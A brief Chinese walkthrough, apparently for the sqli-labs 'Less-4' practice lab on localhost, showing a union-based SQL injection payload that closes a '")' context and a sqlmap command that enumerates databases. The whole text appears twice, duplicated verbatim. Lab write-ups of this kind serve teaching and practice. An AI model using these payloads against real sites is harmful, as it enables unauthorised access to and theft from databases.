这道题也是简单到批爆。
在这里输入",然后提示"),也就是少了"),将后面的"再用--+注释掉就可以了。
?id=1.1") union select 1,2,database() --+
再继续库、表、列名一气呵成就完事了。
sqlmap
sqlmap -u "http://127.0.0.1/Less-4/?id=1" --dbs --batch --no-cast
这道题也是简单到批爆。
在这里输入",然后提示"),也就是少了"),将后面的"再用--+注释掉就可以了。
?id=1.1") union select 1,2,database() --+
再继续库、表、列名一气呵成就完事了。
sqlmap
sqlmap -u "http://127.0.0.1/Less-4/?id=1" --dbs --batch --no-cast
